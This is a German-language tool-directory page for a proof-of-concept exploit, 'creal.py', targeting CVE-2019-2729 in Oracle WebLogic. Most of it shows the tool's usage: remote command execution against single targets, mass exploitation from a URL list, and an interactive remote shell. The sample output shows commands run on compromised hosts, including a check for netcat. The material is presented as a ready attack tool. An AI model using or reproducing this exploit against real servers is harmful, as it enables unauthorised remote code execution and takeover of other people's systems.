Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-2729_creal — PoC zur Ausnutzung von CVE-2019-2729 auf WebLogic | Kitploit
Tools/GitHubGitHub/luchoane/cve-2019-2729_creal
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubluchoane/cve-2019-2729_creal

CVE-2019-2729_creal

PoC zur Ausnutzung von CVE-2019-2729 auf WebLogic

Repository anzeigen
312vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-2729 - creal

PoC zur Ausnutzung von CVE-2019-2729 auf WebLogic

Exploit-Nutzung

root@kitploit:~
python3 creal.py -h
usage: creal.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command
  -s SH, --shell SH     url to connect

Exploit eines einzelnen Ziels:

root@kitploit:~
$ python3 creal.py -u http://IP:PORT -c id

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx

uid=500(UID) gid=500(GID) groups=500(GROUP)

Exploit einer URL-Liste

root@kitploit:~
$ python3 creal.py -f list.txt -c id ____ ____ _____ ____ _ / _Y __\/ __// _ \/ \ | / | \/|| \ | / \|| | | \_| /| /_ | |-||| |_/\ \____|_/\_\\____\\_/ \\\____/ </coded by Luchoane> [++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx uid=500(UID) gid=500(GID) groups=500(GROUP) [-] NOT VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx [!] There was an error connecting! -------------------------- Vulnerable targets scanned: [+] http://xxx.xxx.xxx.xxx:xxxx

Interaktive Shell

root@kitploit:~
$ python3 creal.py -s http://IP:PORT

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

Welcome to the interactive shell for: http://xxx.xxx.xxx.xxx:xxxx
User: USER

> id
uid=500(UID) gid=500(GID) groups=500(GROUP)

> whoami
USER

> which nc
/usr/bin/nc
Tool herunterladen